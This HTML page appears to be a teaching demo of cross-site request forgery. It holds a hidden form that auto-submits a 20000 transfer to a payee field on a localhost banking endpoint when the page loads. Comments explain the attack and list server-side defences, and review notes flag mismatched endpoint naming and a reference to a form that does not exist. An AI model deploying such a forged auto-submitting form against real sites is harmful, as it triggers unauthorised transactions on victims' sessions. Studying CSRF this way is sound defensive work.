<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="UTF-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <meta http-equiv="X-UA-Compatible" content="ie=edge" />
    <title>你被骗了</title>
  </head>

  <body>
    <!--
      CSRF demonstration form: a forged cross-origin transfer request.
      It posts the pre-filled payee and amount fields to the transfer endpoint
      on localhost:3000; the page's script submits it on load, with no user
      interaction. A browser attaches the target origin's cookies to such a
      POST unless the session cookie's SameSite setting forbids it, so the
      server has to reject the request itself: a per-session anti-CSRF token,
      Origin or Referer validation, or re-authentication for transfers.
      NOTE(review): the server-side handler is not shown here, so whether this
      request is accepted cannot be told from this page.
    -->
    <form
      name="sneak"
      action="http://localhost:3000/api/transferSafe"
      method="post"
    >
      <input type="text" name="payee" value="dddd" />
      <input type="text" name="amount" value="20000" />
    </form>
  </body>
  <script>
    window.onload = function () {
      /**
       * Auto-submit the forged form as soon as the page has loaded, so the
       * request is sent without the visitor clicking anything.
       * Enable exactly one of the statements below at a time.
       */
      // NOTE(review): the form's action path is named "transferSafe", while the
      // comment on this call labels it the undefended case; confirm which
      // endpoint each scenario is meant to target.
      document.sneak.submit(); // no CSRF defence in place
      // NOTE(review): no form named "sneak1" exists in this page as shown, so
      // enabling the next line would throw a TypeError instead of submitting.
      // document.sneak1.submit();   // scenario where a verification code (captcha) is required
    };
  </script>
</html>
